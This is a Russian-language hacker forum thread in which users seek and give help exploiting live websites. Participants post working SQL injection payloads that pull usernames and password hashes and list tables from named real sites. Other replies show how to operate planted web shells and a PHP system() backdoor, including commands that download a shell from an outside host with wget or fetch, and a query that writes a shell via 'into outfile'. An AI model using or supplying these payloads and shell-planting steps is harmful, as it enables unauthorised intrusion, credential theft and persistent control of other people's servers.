Это ни разу не скуль. Пойми простые основы как определить есть ли скуль в запросе или нет. Простое подсовывание кавычки в запрос с последующим редиректом/выводом пустой страницы/выводом ошибки скрипта не значат о наличии скули на 100%.

Expl0ited, вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users

http://www.gagauzia.md/search.php

"мой запрос":

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#

547 said:

Expl0ited
, вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users
http://www.gagauzia.md/search.php
"мой запрос":
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#


немного модифицировал запрос

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#

исходник php файла кодирован в base64.

Но при попытке декодировать онлайн декодерами, вылезает билеберда

вот пример исходника

http://zalil.ru/31466463

заюзай notepad++ например. Там что-то бинарное

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,version%28%29,8,9

таблички вывести не получилось(

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,uhnex(hex(table_name)),8,9+from+infor mation_schema.tables --+

есть идеи?

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,/*!concat_ws%280x3a,table_schema,table_name,column_ name%29*/,4,5,6,7,8,9+from+information_schema.columns--

же

попугай said:
заюзай notepad++ например. Там что-то бинарное


а поподробнее можно?)

Cherep said:
а поподробнее можно?)



в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.

Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.

p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.

попугай said:
в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.
Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.
p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.


ладно пасиба, буду пробывать)

Господа, помогите раскрутить эту скулю:

http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep

Expl0ited said:
Он использовал havij


А может кто-нидь реально рассказать, как самому сделать?

А то всякие хеведжи не интересуют.

Konqi said:
немного модифицировал запрос
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#


вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc

FlaktW said:
Господа, помогите раскрутить эту скулю:
http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep




Code:
http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w ')



Code:
master
tempdb
model
msdb
forum_integr
files
wbanner
wcounter
wvote
www
wrate
zbit_net_chat
catalogs
test
forum_gameland
forum_xakep

Дальше тянуть не стал.

fl00der said:
А может кто-нидь реально рассказать, как самому сделать?
А то всякие хеведжи не интересуют.


http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null, null,null,null,null,null,null,null,null,table_name ,null,null,null+from+sys.user_tables

чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался

/thread40576.html

Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал


а втойже папке где шелл, файлик есть ли такой .htaccess

в котором должно быть прописано


AddType application/x-httpd-php .png


без этого сервер будет твой png читать как картинку а не как скрипт.

Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал
и черезз get заросы в строке не пашет...


на шелл есть права на чтение/выполнение?

какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess?

шелл открывается как на скрине?

Qwert321 said:
Это и есть сам шелл, в .htaccess добавлен тип .png
Там рядом лежат ещё blank.png тоше шелл, но забыл пароль... понакуре поставил.


залей нормальный шел https://rdot.org/forum/showthread.php?t=1085.

А если шелл с расширением .php заливать он работает?

Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php

вот кусок кода из шелла про авторизацию

$login = "2";

$pass = "2";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.

Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.


воспользуйся шеллом WSO самый простой и удобный шелл

Стоит phpMyAdmin 2.11.10

Можно ли как нибудь раскрыть пути?

Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.



$login = "root";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

логин root

пасс 2

Как насчет этой скули?


http://bookmail.ru/shop/product/id/4380'


Как ее крутить?

FlaktW said:
Как насчет этой скули?
Как ее крутить?



как то так

http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1

Konqi said:
как то так
http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1


Это круто!

попугай said:
$login = "root";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
логин root
пасс 2




winstrool said:
воспользуйся шеллом WSO самый простой и удобный шелл


Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php

Nolen88 said:
мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php


http://s57.radikal.ru/i155/1107/9d/5612c5da92e8.jpg

Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty

AnGeI said:
http://s57.radikal.ru/i155/1107/9d/5612c5da92e8.jpg
Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty


Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?

Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.


$login = "2"; // ЛОГИН (С) К.О.

$pass = "2"; //ПАРОЛЬ (С) К.О

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.

Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.

d1v said:
$login = "2"; // ЛОГИН (С) К.О.
$pass = "2"; //ПАРОЛЬ (С) К.О
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.
Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.


Извените накипело просто ВЫ наркоманы шоле? Или вы просто посты набиваете и вам лишь бы сказать что нибудь? Я ЗНАЮ ЧТО ПАРОЛЬ 2, ЗНАЮ ЧТО ЛОГИН 2, знаю что хеш пароль 2, я сам это вписал. Я ЗНАЮ ЧТО приоритет будет у $md5_pass. Я разве спросил вас Какой у меня пароль? Я напрямую спрашиваю как вводить логин и пароль чтобы шелл принял его??? И жду ВОТ ТАКОГО ОТВЕТА: Пароль для авторизации нужно водить вот таким синтаксисом - http://site.com/faq.php?pass=c81e728d9d4c2f636f067f89cc14862c - это кстати неправильный вариант. Кто нибудь умеет авторизоваться в с99?

Nolen88 said:
Извените накипело просто ВЫ наркоманы шоле?


пока кроме тебя я накроманов не вижу.

у c99 шелла Basic авторизация! какой нахъ get?!

если у тебя не появляется форма авторизации, значит ты идиот отснифай заголовки и передай скрипту твой логин и пароль в base64 в формате логин:пароль. в твоём случае это будет Mjoy==

d1v said:
пока кроме тебя я накроманов не вижу.
у c99 шелла Basic авторизация! какой нахъ get?!
если у тебя не появляется форма авторизации,
значит ты идиот
отснифай заголовки и передай скрипту твой логин и пароль в base64 в формате логин:пароль. в твоём случае это будет Mjoy==


Откуда я могу знать какая у него авторизация, единственное что он у меня пишет это c99madshell v.2.0 madnet edition: access denied в самом низу страницы мелкими буквами. Поподробнее распиши, как снифать и куда Mjoy== писать)))и кстати в base64 Mg== это цифра 2 почему Mjoy==?

Nolen88 said:
Откуда я могу знать какая у него авторизация, единственное что он у меня пишет это c99madshell v.2.0 madnet edition: access denied в самом низу страницы мелкими буквами. Поподробнее распиши, как снифать и куда Mjoy== писать)))и кстати в base64 Mg== это цифра 2 почему Mjoy==?


1) попробуй сначала открыть шелл в другом браузере. если не помогает установи плагин Tamper Data для FF(что, как, куда - гугл в помощь) и в поле Authorization напиши Basic Mjoy==

2) потому что кодируется не отдельно каждый символ а всё вместе.

На странице

http://www.romauno.tv/page.aspx?ln=it&id=35'

возникает ошибка: Server Error in '/' Application.


Code:


Input string was not in a correct format.

body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }





Server Error in '/' Application.

Input string was not in a correct format.



Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.



Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:






Line 16: void Page_Load(object s, EventArgs e) {
Line 17: language = CMS.GetActiveLanguage(Page);
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);
Line 19:
Line 20: if (pageId>0) {







Source File: d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx    Line: 18


Stack Trace:






[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471479
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:18
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627









Version Information: Microsoft .NET Framework Version:2.0.50727.3615; ASP.NET Version:2.0.50727.3618






- это как то можно использовать, кроме раскрытия путей для эксплуатации других уязвимостей?

Пишу sql injection сканер, есть ли тут уязвимость или просто ошибка:

http://www.kolprint.co.il/info.asp?m=1307952780'

http://www.portaldenoticias.com/imagenes/tag/El-Joven-Manos-de-Tijera?page=%275

заранее благодарен за любой ответ.

Можно ли какнибудь задампить из под шелла mssql базу?

Cherep да можно, например в WSO есть Sql browser

Cherep said:
Можно ли какнибудь задампить из под шелла mssql базу?


Да, для этого существуют MsSQL Dump'ер.


kroŧ said:
На странице
http://www.romauno.tv/page.aspx?ln=it&id=35'
возникает ошибка: Server Error in '/' Application.

Code:


Input string was not in a correct format.

body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }





Server Error in '/' Application.

Input string was not in a correct format.



Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.



Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:






Line 16: void Page_Load(object s, EventArgs e) {
Line 17: language = CMS.GetActiveLanguage(Page);
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);
Line 19:
Line 20: if (pageId>0) {







Source File: d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx    Line: 18


Stack Trace:






[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471479
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:18
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627









Version Information: Microsoft .NET Framework Version:2.0.50727.3615; ASP.NET Version:2.0.50727.3618






- это как то можно использовать, кроме раскрытия путей для эксплуатации других уязвимостей?




Code:
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);

Никак, обычная ошибка типа при передаче параметра в функцию.

Nolen88 said:
Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?


LiveHttpHeaders в помощь. Отправляешь POST запрос и заходишь в шелл.

Чтобы узнать что именно отправлять смотри исходники.

Если возникает ошибка типа:

An error has occurred: Incorrect syntax near '''. Expected end-of-file, ')', ';', '>', OR, AND, IS, IS_NOT, ORDER_BY. SQLSTATE=42000

Можно ли это как-то использовать?!

Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:


if ($_GET['op']){system($_GET['cmd']);
die ('Work');}


Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.

А как дальше? Что и где выполнять?

semafor

Можно почитать справку по функции

http://ru.php.net/manual/ru/function.system.php

> Функция system (). Вызывает команду операционной системы, выводит результат выполнения на экран и возвращает последнюю строку вывода.

semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?



site.ru/logs/logs.php?op=1&cmd=ls

semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?


site.ru/logs/logs.php?op=1&cmd=[системная команда]

Например:

site.ru/logs/logs.php?op=1&cmd=ls -la

alexvrn said:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000
как можно раскрутить?


Тот же вопрос..

P.S Судя по всему, ASP.NET

h00lyshit! said:
site.ru/logs/logs.php?op=1&cmd=
[системная команда]
Например:
site.ru/logs/logs.php?op=1&cmd=ls -la


так я вижу содержание каталога logs. А как залить туда шелл? Пробую

site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php

я на хост залил шелл и переименовал его в readme.txt

Но так ничего не выходит. Что неправильно делаю?

semafor said:
так я вижу содержание каталога logs. А как залить туда шелл? Пробую
site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php
я на хост залил шелл и переименовал его в readme.txt
Но так ничего не выходит. Что неправильно делаю?


site.ru/logs/logs.php?op=1&cmd=wget http://moy_domen.ru/readme.txt -O shell.php

alexvrn said:

Code:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000

Помогите срочно


Как обычно, закончив этот запрос и добавив злоумышленный код. Но тут ясновидцев нет, ссылку?

при попытке сделать sql inj в vBulletin 4.1.2(форум с капчей), когда посылаю любой запрос(допустим на таблицы), вылезает что я неправильно ввел капчу, хотя при указании запроса в строку


Code:
descending&humanverify%5Binput%5D=число

вписываю правильный ответ

на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?

Доброго времени суток. Помогите разобраться пожалуйста. Как можно использовать это - http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='&password=1

foozzi said:
на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?


нельзя. вот используй в своих мерах:

/thread79705.html

Moriarty said:
Судя по всему логин и пароль принимаются из $_REQUEST[], но режутся любые пробелы.


Через эту ошибку можно в базу залесть?

Melfis, ничего не получится, скобки тоже фильтруются

http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='0()'0&password=1

Подскажите пожалуйста, а с этим можно чего-нить сделать? Это вообще уязвимость или нет? - http://mag.su/maglove/viewprofiles.php?sid=1&next=1'

Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)

eternal stud said:
Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)


залей шелл через fetch )

eternal stud said:
Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)


fetch http://yousite.com/shell.txt; mv shell.txt shell.php;

При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка:

http://pikucha.ru/i5NOd

Cherep said:
При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка:
http://pikucha.ru/i5NOd


php интерпретатору не удалось получить информацию о удаленном хосте

Expl0ited said:
php интерпретатору не удалось получить информацию о удаленном хосте


у меня какбы заходит спокойно по адресу шелла. И что делать?

Cherep said:
у меня какбы заходит спокойно по адресу шелла. И что делать?


Использовать поиск по форуму: /showthread.php?t=191917

И внимательно читать не только первый пост.

Помогите раскрутить SQL inj

Уязвимая страница


Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем


Code:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D 85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30 %26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL

Описание проблемы


Там уязвимые поля имеют числовой тип в итоге чтобы туда я не писал сервер пытается сконвертить ответ в число что у него конечно не получается, вот и нашел другие параметры но в этих параметрах у меня не получается вызвать какую-либо реакцию, может быть у меня опять че-то замкнуло?

eclipse said:
Помогите раскрутить SQL inj
Уязвимая страница

Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем

Code:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D 85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30 %26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL
Описание проблемы


Эту скулю не раскрутить

Эту скулю не раскрутить


С чего ты взял? Аргументируй пож.

Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.

plaeer said:
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.


если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов


*.php?id=-1 union select 'код шела или уплодера' into outfile '/путь до сайта с папкой разрешенной для заливки файлов/shell.php'+--+

Кинь сайт в ПМ.

Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin

Заранее спасибо

eternal stud said:
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin
Заранее спасибо


нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.